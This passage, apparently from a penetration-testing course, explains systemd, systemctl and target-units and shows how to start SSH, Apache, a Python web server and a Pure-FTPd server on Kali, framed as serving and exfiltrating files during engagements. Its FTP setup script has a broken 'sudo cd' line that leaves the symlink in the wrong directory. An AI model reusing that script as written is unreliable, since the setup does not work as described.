In the listing above, we can determine that our Kali host is using Systemd since the /sbin/init file is a symbolic link to /lib/systemd/systemd and is the first process used to initialize the system on startup.

Systemd uses a utility called systemctl to control it. This is very similar to the service utility, but the syntax is reversed for the service-name and action. Let's take ssh as an example and start this on our host with systemctl.

$ sudo systemctl start ssh
[sudo] password for kali: 

Since there wasn't an error output to our screen, we can expect that the ssh service is up and running. There are several other actions that can be taken with the systemctl utility, as well. The following are some important actions.

Let's verify the status of the ssh service.

$ systemctl status ssh
● ssh.service - OpenBSD Secure Shell server
     Loaded: loaded (/lib/systemd/system/ssh.service; disabled; vendor preset: disabled)
     Active: active (running) since Thu 2021-07-22 12:52:23 MST; 1h 2min ago
       Docs: man:sshd(8)
             man:sshd_config(5)
    Process: 65249 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)
    Process: 65292 ExecReload=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)
    Process: 65293 ExecReload=/bin/kill -HUP $MAINPID (code=exited, status=0/SUCCESS)
   Main PID: 65250 (sshd)
      Tasks: 1 (limit: 4631)
     Memory: 1.1M
        CPU: 42ms
     CGroup: /system.slice/ssh.service
             └─65250 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups

$

In SysV Init, we covered the concept of the 7 runlevels. We also looked at how runlevels were handled in the /etc/rc#.d/ directories and how the scripts would execute in alphanumeric order. Systemd improved upon this design through the utilization of target-units. Target-units are very similar in concept to runlevels, in that they define what services run at each target-unit level. Unlike runlevels, there is more flexibility to define more than 7 classifications. Let's take a look at our Kali host's target-units with the systemctl utility. Your host may appear different than the demonstration.

$ sudo systemctl list-units --type=target --all
  UNIT                                                                                 LOAD   ACTIVE   SUB    DESCRIPTION
  basic.target                                                                         loaded active   active Basic System
  blockdev@dev-disk-by\x2duuid-7f8e9fc5\x2db150\x2d4c9f\x2db1c5\x2db7928fe02ed8.target loaded inactive dead   Block Device Preparation for /dev/disk/by-uuid/7f8e9fc5-b150-4c9f-b1c5-b7928fe02ed8
  blockdev@dev-dm\x2d1.target                                                          loaded inactive dead   Block Device Preparation for /dev/dm-1
  blockdev@dev-mapper-RedHatAugust\x2d\x2dvg\x2droot.target                            loaded inactive dead   Block Device Preparation for /dev/mapper/RedHatAugust--vg-root
  blockdev@dev-mapper-RedHatAugust\x2d\x2dvg\x2dswap_1.target                          loaded inactive dead   Block Device Preparation for /dev/mapper/RedHatAugust--vg-swap_1
  [email protected]                                                             loaded inactive dead   Block Device Preparation for /dev/sda1
  cryptsetup.target                                                                    loaded active   active Local Encrypted Volumes
  emergency.target                                                                     loaded inactive dead   Emergency Mode
  first-boot-complete.target                                                           loaded inactive dead   First Boot Complete
  getty-pre.target                                                                     loaded inactive dead   Login Prompts (Pre)
  getty.target                                                                         loaded active   active Login Prompts
  graphical.target                                                                     loaded active   active Graphical Interface
  local-fs-pre.target                                                                  loaded active   active Local File Systems (Pre)
  local-fs.target                                                                      loaded active   active Local File Systems
  multi-user.target                                                                    loaded active   active Multi-User System
  network-online.target                                                                loaded active   active Network is Online
  network-pre.target                                                                   loaded inactive dead   Network (Pre)
  network.target                                                                       loaded active   active Network
  nfs-client.target                                                                    loaded active   active NFS client services
  nss-user-lookup.target                                                               loaded inactive dead   User and Group Name Lookups
  paths.target                                                                         loaded active   active Paths
  remote-fs-pre.target                                                                 loaded active   active Remote File Systems (Pre)
  remote-fs.target                                                                     loaded active   active Remote File Systems
  rescue.target                                                                        loaded inactive dead   Rescue Mode
  shutdown.target                                                                      loaded inactive dead   Shutdown
  slices.target                                                                        loaded active   active Slices
  sockets.target                                                                       loaded active   active Sockets
  sound.target                                                                         loaded active   active Sound Card
  stunnel.target                                                                       loaded active   active TLS tunnels for network services - per-config-file target
  swap.target                                                                          loaded active   active Swap
  sysinit.target                                                                       loaded active   active System Initialization
  time-set.target                                                                      loaded inactive dead   System Time Set
  time-sync.target                                                                     loaded inactive dead   System Time Synchronized
  timers.target                                                                        loaded active   active Timers
  umount.target                                                                        loaded inactive dead   Unmount All Filesystems

LOAD   = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB    = The low-level unit activation state, values depend on unit type.
35 loaded units listed.
To show all installed unit files use 'systemctl list-unit-files'.

$

In the case of the listing above, there are currently 35 loaded units listed. This is much more dynamic than the limited 7 in SysV Init runlevels. There are also three categorizations for each target-unit: LOAD, ACTIVE, and SUB.

LOAD specifies if a target-unit is loaded in the Linux host. This means the system can read the unit configuration file. If it is loaded, it can be called on to change the target-unit behavior of the system. This can be used to take actions such as enabling/disabling network services on a system.

ACTIVE specifies if a particular target-unit is currently active or not. This does not necessarily mean that a set of services is running under that target, but the target-unit was run if it says active.

SUB specifies the status of the services running under a target-unit. Some service types can run a single time and are not continuous. This may show as exited. If a service is continuous and running, active will be shown under this field. If the process associated with the service is not running, dead will be shown in this field.

The benefit of target-units is that these can be run in parallel and isn't a choice of one or the other. They do not need to be started or stopped in a sequenced order, like the /etc/rc#.d/ directories. There's also an advantage of supplying dependencies (conditions that need to be before to an operation) within the target services. These will automatically start the dependencies or exit with an error if the dependency cannot be met. The target-units and services can be found in /usr/lib/systemd/system/. Let's take a look at one of the service files in this directory.

$ cat /usr/lib/systemd/system/ssh.service
[Unit]
Description=OpenBSD Secure Shell server
Documentation=man:sshd(8) man:sshd_config(5)
After=network.target auditd.service
ConditionPathExists=!/etc/ssh/sshd_not_to_be_run

[Service]
EnvironmentFile=-/etc/default/ssh
ExecStartPre=/usr/sbin/sshd -t
ExecStart=/usr/sbin/sshd -D $SSHD_OPTS
ExecReload=/usr/sbin/sshd -t
ExecReload=/bin/kill -HUP $MAINPID
KillMode=process
Restart=on-failure
RestartPreventExitStatus=255
Type=notify
RuntimeDirectory=sshd
RuntimeDirectoryMode=0755

[Install]
WantedBy=multi-user.target
Alias=sshd.service

The After line is how Systemd handles dependencies in services. A Before line could also be added if this service needed to start before another target-unit. The ExecStart line is the script execution to start the service. The WantedBy line defines which target this service should be included in. In the case of the listing example, the ssh service is included in the multi-user.target target-unit.

Despite there being so many target-units, there is still a correlation between runlevels and target-units. Let's execute the following command on our Kali host to see how the target-units relate to runlevels.

$ ls -al /lib/systemd/system/runlevel*
lrwxrwxrwx 1 root root   15 Apr 12 11:21 /lib/systemd/system/runlevel0.target -> poweroff.target
lrwxrwxrwx 1 root root   13 Apr 12 11:21 /lib/systemd/system/runlevel1.target -> rescue.target
lrwxrwxrwx 1 root root   17 Apr 12 11:21 /lib/systemd/system/runlevel2.target -> multi-user.target
lrwxrwxrwx 1 root root   17 Apr 12 11:21 /lib/systemd/system/runlevel3.target -> multi-user.target
lrwxrwxrwx 1 root root   17 Apr 12 11:21 /lib/systemd/system/runlevel4.target -> multi-user.target
lrwxrwxrwx 1 root root   16 Apr 12 11:21 /lib/systemd/system/runlevel5.target -> graphical.target
lrwxrwxrwx 1 root root   13 Apr 12 11:21 /lib/systemd/system/runlevel6.target -> reboot.target
---
Output Trimmed

There is much more to Systemd than what we covered here. We covered services and target-units with Systemd, but there are other types such as mount, link, socket, device, and more. These are not as important to understand as the concept of services and how it relates to the legacy SysV Init system.

SSH

The Secure Shell (SSH) service is most commonly used to remotely access a computer, using a secure, encrypted protocol. However, as we will see later on in the course, the SSH protocol has some surprising and useful features, beyond providing terminal access. The SSH service is TCP-based and listens by default on port 22. To start the SSH service in Kali, type the following command into a Kali terminal.

# sudo systemctl start ssh
[sudo] password for kali: 

We can verify that the SSH service is running and listening on TCP port 22 by using the netstat command and piping the output into the grep command to search the output for sshd.

# sudo netstat -antp|grep sshd
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 25035/sshd 
tcp6 0 0 :::22 :::* LISTEN 25035/sshd

If, like many users, you want to have the SSH service start automatically at boot time, you need to enable it using the systemctl command as follows. The systemctl command can be used to enable and disable most services within Kali Linux.

$ sudo systemctl enable ssh
Synchronizing state of ssh.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install enable ssh
Created symlink /etc/systemd/system/sshd.service → /lib/systemd/system/ssh.service.
Created symlink /etc/systemd/system/multi-user.target.wants/ssh.service → /lib/systemd/system/ssh.service.

Unless ssh is used very often, we advise that the ssh service is started and stopped as needed. As such, we can disable the service to prevent it from starting at boot time.

$ sudo systemctl disable ssh
Synchronizing state of ssh.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install disable ssh
Removed /etc/systemd/system/multi-user.target.wants/ssh.service.
Removed /etc/systemd/system/sshd.service.

Now that we know how to start the ssh service, we can utilize ssh to gain access to our host from other machines.

HTTP

The HTTP service can come in handy during a penetration test, either for hosting a site, or providing a platform for downloading files to a victim machine. The HTTP service is TCP-based and listens by default on port 80. To start the HTTP service in Kali, type the following command into a terminal.

$ sudo systemctl start apache2
[sudo] password for kali:

As we did with the SSH service, we can verify that the HTTP service is running and listening on TCP port 80 by using the netstat and grep commands once again.

$ sudo netstat -antp | grep apache
tcp6       0      0 :::80                   :::*                    LISTEN      4378/apache2        

There is a much more common way to create a temporary web server that uses python. It is useful to have a temporary solution to run on demand and not worry about exposing ports on our Kali host that we don't need. Before we can show that on port 80, we'll need to stop the apache2 service. Let's do that now.

$ sudo systemctl stop apache2
[sudo] password for kali:

Now that we won't have a port conflict on port 80, let's use the python module SimpleHTTPServer to start the web service with python.

$ sudo python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

The terminal session hangs after the execution of this command. This is due to the application currently being run. When we are finished with our web service needs, we can simply enter Ctrl + C.

Now that we covered two ways to start a web server, we can utilize this on penetration test engagements to download files into a compromised host.

FTP (pure-ftpd)

FTP is a great way to transfer files from one host to another quickly. This can be used to share files on the same network or even used to exfiltrate files from compromised machines. We covered the FTP client previously, so let's move on to creating a simple FTP server on our Kali host.

Let's quickly install the Pure-FTPd server on our Kali attack machine. If you already have an FTP server configured on your Kali system, you may skip these steps.

$ sudo apt update && sudo apt install pure-ftpd

Before any clients can connect to our FTP server, we need to create a new user for Pure-FTPd. The following Bash script will automate user creation for us:

#!/bin/bash

sudo groupadd ftpgroup
sudo useradd -g ftpgroup -d /dev/null -s /etc ftpuser
sudo pure-pw useradd offsec -u ftpuser -d /ftphome
sudo pure-pw mkdb
sudo cd /etc/pure-ftpd/auth/
sudo ln -s ../conf/PureDB 60pdb
sudo mkdir -p /ftphome
sudo chown -R ftpuser:ftpgroup /ftphome/
sudo systemctl restart pure-ftpd

We will make the script executable, then run it and enter "lab" as the password for the offsec user when prompted:

$ chmod +x setup-ftp.sh
$ sudo ./setup-ftp.sh
Password:
Enter it again:
Restarting ftp server

Now that we have our FTP server set up, we can leverage this with the username and password we added when creating the server. As always, only run this service when you need it and stop it when you don't.


Relevant Note(s): Linux Basics